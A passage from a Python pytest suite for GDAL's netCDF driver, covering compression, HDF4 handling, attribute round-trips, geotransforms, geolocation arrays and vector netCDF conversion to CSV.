return netcdf_test_deflate('data/utm.tif', 50235)
###############################################################################
# check support for writing large file with DEFLATE compression
# if chunking is not defined properly within the netcdf driver, this test can take 1h
def test_netcdf_21():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
bigfile = 'tmp/cache/utm-big.tif'
sys.stdout.write('.')
sys.stdout.flush()
# create cache dir if absent
if not os.path.exists('tmp/cache'):
os.mkdir('tmp/cache')
# look for large gtiff in cache
if not os.path.exists(bigfile):
# create large gtiff
if test_cli_utilities.get_gdalwarp_path() is None:
pytest.skip('gdalwarp not found')
warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
'data/utm.tif ' + bigfile
try:
(ret, err) = gdaltest.runexternal_out_and_err(warp_cmd)
except OSError:
pytest.fail('gdalwarp execution failed')
assert not (err != '' or ret != ''), \
('gdalwarp returned error\n' + str(ret) + ' ' + str(err))
# test compression of the file, with a conservative timeout of 60 seconds
return netcdf_test_deflate(bigfile, 26695, 6, 60)
###############################################################################
# check support for hdf4
def test_netcdf_22():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_hdf4:
pytest.skip()
ifile = 'data/hdifftst2.hdf'
# suppress warning
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open('NETCDF:' + ifile)
gdal.PopErrorHandler()
if ds is None:
pytest.fail('netcdf driver did not open hdf4 file')
else:
ds = None
###############################################################################
# check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def test_netcdf_23():
# don't skip if netcdf is not enabled in GDAL
# if gdaltest.netcdf_drv is None:
# return 'skip'
# if not gdaltest.netcdf_drv_has_hdf4:
# return 'skip'
# skip test if Hdf4 is not enabled in GDAL
if gdal.GetDriverByName('HDF4') is None and \
gdal.GetDriverByName('HDF4Image') is None:
pytest.skip()
ifile = 'data/hdifftst2.hdf'
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open hdf4 file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if opened with the netCDF driver
assert name != 'netCDF', 'netcdf driver opened hdf4 file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name != 'netCDF', 'netcdf driver was identified for hdf4 file'
###############################################################################
# check support for reading attributes (single values and array values)
def test_netcdf_24():
if gdaltest.netcdf_drv is None:
pytest.skip()
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('data/nc_vars.nc', vals_global, vals_band)
###############################################################################
# check support for NC4 reading attributes (single values and array values)
def netcdf_24_nc4():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_s': '0,255',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556'}
return netcdf_check_vars('data/nc4_vars.nc', vals_global, vals_band)
###############################################################################
# check support for writing attributes (single values and array values)
def test_netcdf_25():
if gdaltest.netcdf_drv is None:
pytest.skip()
netcdf_test_copy('data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc')
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('tmp/netcdf_25.nc', vals_global, vals_band)
###############################################################################
# check support for NC4 writing attributes (single values and array values)
def netcdf_25_nc4():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
netcdf_test_copy('data/nc4_vars.nc', 1, None, 'tmp/netcdf_25_nc4.nc', ['FORMAT=NC4'])
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('tmp/netcdf_25_nc4.nc', vals_global, vals_band)
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def test_netcdf_26():
if gdaltest.netcdf_drv is None:
pytest.skip()
# test default config
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4672)
gdal.PushErrorHandler('CPLQuietErrorHandler')
test.testCreateCopy(check_gt=0, check_srs=0, check_minmax=0)
gdal.PopErrorHandler()
# test WRITE_BOTTOMUP=NO
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4855,
options=['WRITE_BOTTOMUP=NO'])
test.testCreateCopy(check_gt=0, check_srs=0, check_minmax=0)
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def test_netcdf_27():
if gdaltest.netcdf_drv is None:
pytest.skip()
# test default config
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4672)
config_bak = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', None)
test.testOpen()
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', config_bak)
# test GDAL_NETCDF_BOTTOMUP=NO
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4855)
config_bak = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', 'NO')
test.testOpen()
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', config_bak)
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile(ofile):
# test result file has 8 bands and 0 subdasets (instead of 0 bands and 8 subdatasets)
ds = gdal.Open(ofile)
assert ds is not None, 'open of copy failed'
md = ds.GetMetadata('SUBDATASETS')
subds_count = 0
if md is not None:
subds_count = len(md) / 2
assert ds.RasterCount == 8 and subds_count == 0, \
('copy has %d bands (expected 8) and has %d subdatasets'
' (expected 0)' % (ds.RasterCount, subds_count))
ds = None
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
print('NOTICE: ncdump not found')
return
if err is None or 'netcdf library version' not in err:
print('NOTICE: ncdump not found')
return
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h ' + ofile)
assert ret != '' and err == '', 'ncdump failed'
# simple dimension tests using ncdump output
err = ""
if 'int t(time, levelist, lat, lon) ;' not in ret:
err = err + 'variable (t) has wrong dimensions or is missing\n'
if 'levelist = 2 ;' not in ret:
err = err + 'levelist dimension is missing or incorrect\n'
if 'int levelist(levelist) ;' not in ret:
err = err + 'levelist variable is missing or incorrect\n'
if 'time = 4 ;' not in ret:
err = err + 'time dimension is missing or incorrect\n'
if 'double time(time) ;' not in ret:
err = err + 'time variable is missing or incorrect\n'
# uncomment this to get full header in output
# if err != '':
# err = err + ret
assert err == ''
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def test_netcdf_28():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf-4d.nc'
ofile = 'tmp/netcdf_28.nc'
# copy file
netcdf_test_copy(ifile, 0, None, ofile)
# test file
return netcdf_test_4dfile(ofile)
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy file to netcdf.
# The workaround is (currently ??) necessary because dimension rolling code is
# in netCDFDataset::CreateCopy() and necessary dimension metadata
# is not saved to netcdf when using gdalwarp (as the driver does not write
# metadata to netcdf file with SetMetadata() and SetMetadataItem()).
def test_netcdf_29():
if gdaltest.netcdf_drv is None:
pytest.skip()
# create tif file using gdalwarp
if test_cli_utilities.get_gdalwarp_path() is None:
pytest.skip('gdalwarp not found')
ifile = 'data/netcdf-4d.nc'
ofile1 = 'tmp/netcdf_29.vrt'
ofile = 'tmp/netcdf_29.nc'
warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
(test_cli_utilities.get_gdalwarp_path(), ifile, ofile1)
try:
(ret, err) = gdaltest.runexternal_out_and_err(warp_cmd)
except OSError:
pytest.fail('gdalwarp execution failed')
assert not (err != '' or ret != ''), \
('gdalwarp returned error\n' + str(ret) + ' ' + str(err))
# copy vrt to netcdf, with proper dimension rolling
netcdf_test_copy(ofile1, 0, None, ofile)
# test file
netcdf_test_4dfile(ofile)
###############################################################################
# check support for file with nan values (bug #4705)
def test_netcdf_30():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'trmm-nan.nc', 1, 62519)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
# check if 2x2 file has proper geotransform
# 1 pixel (in width or height) still unsupported because we can't get the pixel dimensions
def test_netcdf_31():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/trmm-2x2.nc')
ds.GetProjection()
gt = ds.GetGeoTransform()
gt1 = (-80.0, 0.25, 0.0, -19.5, 0.0, -0.25)
assert gt == gt1, ('Incorrect geotransform, got ' + str(gt))
ds = None
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def test_netcdf_32():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ifile = 'data/byte.tif'
ofile = 'tmp/netcdf_32.nc'
# gdal.SetConfigOption('CPL_DEBUG', 'ON')
# test basic read/write
netcdf_test_copy(ifile, 1, 4672, ofile, ['FORMAT=NC4'])
netcdf_test_copy(ifile, 1, 4672, ofile, ['FORMAT=NC4C'])
###############################################################################
# TEST NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def test_netcdf_33():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/nc_vars.nc'
ofile = 'tmp/netcdf_33.nc'
netcdf_test_copy(ifile, 1, None, ofile, ['FORMAT=NC4'])
return netcdf_check_vars('tmp/netcdf_33.nc')
###############################################################################
# check support for reading large file with chunking and DEFLATE compression
# if chunking is not supported within the netcdf driver, this test can take very long
def test_netcdf_34():
filename = 'utm-big-chunks.nc'
# this timeout is more than enough - on my system takes <1s with fix, about 25 seconds without
timeout = 5
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
try:
from multiprocessing import Process
except ImportError:
pytest.skip('from multiprocessing import Process failed')
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/' + filename, filename):
pytest.skip()
sys.stdout.write('.')
sys.stdout.flush()
tst = gdaltest.GDALTest('NetCDF', '../tmp/cache/' + filename, 1, 31621)
# tst.testOpen()
gdal.PushErrorHandler('CPLQuietErrorHandler')
proc = Process(target=tst.testOpen)
proc.start()
proc.join(timeout)
gdal.PopErrorHandler()
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
pytest.fail('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout))
###############################################################################
# test writing a long metadata > 8196 chars (bug #5113)
def test_netcdf_35():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf_fixes.nc'
ofile = 'tmp/netcdf_35.nc'
# copy file
netcdf_test_copy(ifile, 0, None, ofile)
# test long metadata is copied correctly
ds = gdal.Open(ofile)
assert ds is not None, 'open of copy failed'
md = ds.GetMetadata('')
assert 'U#bla' in md, 'U#bla metadata absent'
bla = md['U#bla']
assert len(bla) == 9591, \
('U#bla metadata is of length %d, expecting %d' % (len(bla), 9591))
assert bla[-4:] == '_bla', \
('U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla'))
###############################################################################
# test for correct geotransform (bug #5114)
def test_netcdf_36():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf_fixes.nc'
ds = gdal.Open(ifile)
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-3.498749944898817, 0.0025000042385525173, 0.0, 46.61749818589952, 0.0, -0.001666598849826389)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# test for correct geotransform with longitude wrap
def test_netcdf_36_lonwrap():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/nc_lonwrap.nc'
ds = gdal.Open(ifile)
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-2.25, 2.5, 0.0, 16.25, 0.0, -2.5)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# test for reading gaussian grid (bugs #4513 and #5118)
def test_netcdf_37():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/reduce-cgcms.nc'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open(ifile)
gdal.PopErrorHandler()
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
md = ds.GetMetadata('GEOLOCATION2')
assert md and 'Y_VALUES' in md, 'did not get 1D geolocation'
y_vals = md['Y_VALUES']
assert y_vals.startswith('{-87.15909455586265,-83.47893666931698,') and y_vals.endswith(',83.47893666931698,87.15909455586265}'), \
'got incorrect values in 1D geolocation'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def test_netcdf_38():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/bug5118.nc'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open(ifile)
gdal.PopErrorHandler()
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-1659.3478178136488, 13.545000861672793, 0.0, 2330.054725283668, 0.0, -13.54499744233631)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# Test VRT and NETCDF:
def test_netcdf_39():
if gdaltest.netcdf_drv is None:
pytest.skip()
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:tmp/two_vars_scale_offset.nc:z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"tmp/two_vars_scale_offset.nc":z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('%s/tmp/netcdf_39.vrt' % os.getcwd(), src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
src_ds = gdal.Open('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
del out_ds
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
###############################################################################
# Check support of reading of chunked bottom-up files.
def test_netcdf_40():
if gdaltest.netcdf_drv is None or not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
return netcdf_test_copy('data/bug5291.nc', 0, None, 'tmp/netcdf_40.nc')
###############################################################################
# Test support for georeferenced file without CF convention
def test_netcdf_41():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.Open('data/byte_no_cf.nc')
assert ds.GetGeoTransform() == (440720, 60, 0, 3751320, 0, -60)
assert ds.GetProjectionRef().find('26711') >= 0, ds.GetGeoTransform()
###############################################################################
# Test writing & reading GEOLOCATION array
def test_netcdf_42():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.GetDriverByName('MEM').Create('', 60, 39, 1)
src_ds.SetMetadata([
'LINE_OFFSET=0',
'LINE_STEP=1',
'PIXEL_OFFSET=0',
'PIXEL_STEP=1',
'SRS=GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9108"]],AXIS["Lat",NORTH],AXIS["Long",EAST],AUTHORITY["EPSG","4326"]]',
'X_BAND=1',
'X_DATASET=../gcore/data/sstgeo.tif',
'Y_BAND=2',
'Y_DATASET=../gcore/data/sstgeo.tif'], 'GEOLOCATION')
sr = osr.SpatialReference()
sr.ImportFromEPSG(32631)
src_ds.SetProjection(sr.ExportToWkt())
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_42.nc', src_ds)
ds = gdal.Open('tmp/netcdf_42.nc')
assert (ds.GetMetadata('GEOLOCATION') == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lat',
'Y_BAND': '1'})
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lon')
assert ds.GetRasterBand(1).Checksum() == 36043
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lat')
assert ds.GetRasterBand(1).Checksum() == 33501
###############################################################################
# Test reading GEOLOCATION array from geotransform (non default)
def test_netcdf_43():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.Open('data/byte.tif')
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_43.nc', src_ds, options=['WRITE_LONLAT=YES'])
ds = gdal.Open('tmp/netcdf_43.nc')
assert (ds.GetMetadata('GEOLOCATION') == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lat',
'Y_BAND': '1'})
tmp_ds = gdal.Warp('', 'tmp/netcdf_43.nc', options = '-f MEM -geoloc')
gt = tmp_ds.GetGeoTransform()
assert gt[0] == pytest.approx(-117.3, abs=1), gt
assert gt[3] == pytest.approx(33.9, abs=1), gt
###############################################################################
# Test NC_USHORT/UINT read/write - netcdf-4 only (#6337)
def test_netcdf_44():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
for f, md5 in ('data/ushort.nc', 18), ('data/uint.nc', 10):
netcdf_test_copy(f, 1, md5, 'tmp/netcdf_44.nc', ['FORMAT=NC4'])
###############################################################################
# Test reading a vector NetCDF 3 file
def test_netcdf_45():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_RASTER)
assert ds is None
# Test that a raster cannot be opened in vector-only mode
ds = gdal.OpenEx('data/cf-bug636.nc', gdal.OF_VECTOR)
assert ds is None
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_45.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_45.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_45.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_45.csv')
gdal.Unlink('/vsimem/netcdf_45.csvt')
gdal.Unlink('/vsimem/netcdf_45.prj')
###############################################################################
# Test reading a vector NetCDF 3 file
def test_netcdf_46():
if gdaltest.netcdf_drv is None:
pytest.skip()
if test_cli_utilities.get_test_ogrsf_path() is None:
pytest.skip()
ret = gdaltest.runexternal(test_cli_utilities.get_test_ogrsf_path() + ' -ro data/test_ogr_nc3.nc')
assert ret.find('INFO') != -1 and ret.find('ERROR') == -1
###############################################################################
# Test reading a vector NetCDF 4 file
def test_netcdf_47():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_RASTER)
assert ds is None
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_VECTOR)
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_47.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_47.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_47.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_47.csv')
gdal.Unlink('/vsimem/netcdf_47.csvt')
gdal.Unlink('/vsimem/netcdf_47.prj')
###############################################################################
# Test reading a vector NetCDF 3 file without any geometry
def test_netcdf_48():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_no_xyz_var.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
assert lyr.GetGeomType() == ogr.wkbNone
f = lyr.GetNextFeature()
assert f['int32'] == 1
###############################################################################
# Test reading a vector NetCDF 3 file with X,Y,Z vars as float
def test_netcdf_49():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_xyz_float.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_49.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_49.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32
"POINT Z (1 2 3)",1
"POINT (1 2)",
,,
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_49.csv')
###############################################################################
# Test creating a vector NetCDF 3 file with WKT geometry field
def test_netcdf_50():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('../ogr/data/poly.shp', gdal.OF_VECTOR)
out_ds = gdal.VectorTranslate('tmp/netcdf_50.nc', ds, format='netCDF', layerCreationOptions=['WKT_DEFAULT_WIDTH=1'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
out_ds = gdal.OpenEx('tmp/netcdf_50.nc', gdal.OF_VECTOR)
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
